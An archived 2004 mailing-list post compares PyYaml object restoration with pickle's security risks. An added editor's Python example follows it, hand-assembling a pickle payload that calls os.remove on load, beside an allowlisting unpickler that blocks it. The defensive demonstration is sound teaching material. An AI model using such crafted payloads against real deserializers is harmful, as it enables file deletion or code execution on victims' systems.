PyYaml?
Chris S.
chrisks at NOSPAM.udel.edu
Sat Sep 18 01:26:28 EDT 2004
Andrew Dalke wrote:
> Looking at the PyYaml docs, under "limitations"
>
>
> ] PyYaml converts Python builtin types bidirectionally, and converts
> ] instances unidirectionally (although with directives eg from_yaml
> ] and to_yaml it can do this bidirectionally). When YAMLizing an
> ] instance, PyYaml serializes only its instance data (its '.dict'),
> ] with no meta-information about which class it came from.
>
> Add support for restoring an arbitrary class and you end
> up with exactly the same security problems pickle has.
I believe those docs are slightly outdated. PyYaml does have limited
support for class restoration (at least in my experience). Granted, the
class definition must be loaded into the current frame, a similar
limitation of Pickle. However, Pickle's small programming language
allows for arbitrary file deletion. That would not be possible with Yaml.
> Also, I'll guess that it doesn't handle Python's new __slots__
> since it only mentions __dict__.
True. In fact, the current implementation doesn't yet fully handle
subclassing/inheritance. They've done a lot, but it's still a work in
progress.
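Added example (editor's code, not from either poster and not PyYaml or pickle project code) illustrating the pickle behaviour discussed above: a hand-assembled pickle stream whose GLOBAL and REDUCE opcodes call os.remove on a path chosen by whoever wrote the bytes, with no class definition required in the loading process, and the allowlisting find_class() countermeasure described in the pickle module documentation. The helper names (build_delete_payload, RestrictedUnpickler, demo), the ALLOWED set and the use of a temporary file as the deletion target are this example's own choices.

```python
"""Crafted pickle -> arbitrary callable invocation, and an allowlisting unpickler.

Constructed demonstration, not code from the thread. The victim file is a
temporary file created by demo() so the example is safe to run.
"""
import io
import os
import pickle
import tempfile


def build_delete_payload(path):
    """Hand-assemble a protocol-0 pickle that runs os.remove(path) when loaded.

    GLOBAL ('c') resolves any importable module.name; REDUCE ('R') calls the
    callable beneath the argument tuple. Nothing here depends on a class being
    defined by the loader: os.remove is reachable by name alone.
    """
    return (
        b"cos\nremove\n"                                 # GLOBAL  -> push os.remove
        + b"("                                           # MARK
        + b"V" + path.encode("raw-unicode-escape") + b"\n"  # UNICODE -> push path
        + b"t"                                           # TUPLE   -> (path,)
        + b"R"                                           # REDUCE  -> os.remove(path)
        + b"."                                           # STOP
    )


class RestrictedUnpickler(pickle.Unpickler):
    """Allowlist-based unpickler (the pattern from the pickle module docs).

    Every GLOBAL opcode goes through find_class(); only the (module, name)
    pairs listed in ALLOWED may be resolved, so 'os.remove' is refused before
    it is ever called. ALLOWED is an illustrative choice for this example.
    """

    ALLOWED = {
        ("builtins", "set"),
        ("builtins", "frozenset"),
        ("collections", "OrderedDict"),
    }

    def find_class(self, module, name):
        if (module, name) in self.ALLOWED:
            return super().find_class(module, name)
        raise pickle.UnpicklingError(f"global '{module}.{name}' is forbidden")


def load_restricted(payload):
    """Deserialize with the allowlisting unpickler."""
    return RestrictedUnpickler(io.BytesIO(payload)).load()


def demo():
    """Run the payload both ways against a throwaway temp file.

    Returns (deleted_by_plain_loads, blocked_by_restricted_loads): the first
    is True when pickle.loads() removed the file, the second when the
    restricted loader refused the GLOBAL and the file was still present.
    """
    fd, path = tempfile.mkstemp(prefix="pickle-demo-")
    os.close(fd)
    payload = build_delete_payload(path)

    try:
        load_restricted(payload)
        blocked = False
    except pickle.UnpicklingError:
        blocked = os.path.exists(path)   # refused, and the file survived

    pickle.loads(payload)                # unrestricted load: os.remove(path) runs
    deleted = not os.path.exists(path)
    return deleted, blocked


if __name__ == "__main__":
    print("plain pickle.loads deleted file:", demo()[0])
    print("restricted loader blocked it:  ", demo()[1])
```

The restricted loader still round-trips ordinary data (dicts, lists, strings, numbers need no GLOBAL at all), which is the point: the allowlist is the difference between "restore the types I expect" and "call whatever the byte stream names". Any deserializer that resolves class or callable names from its input, YAML tags included, has to draw that same line or it inherits this behaviour.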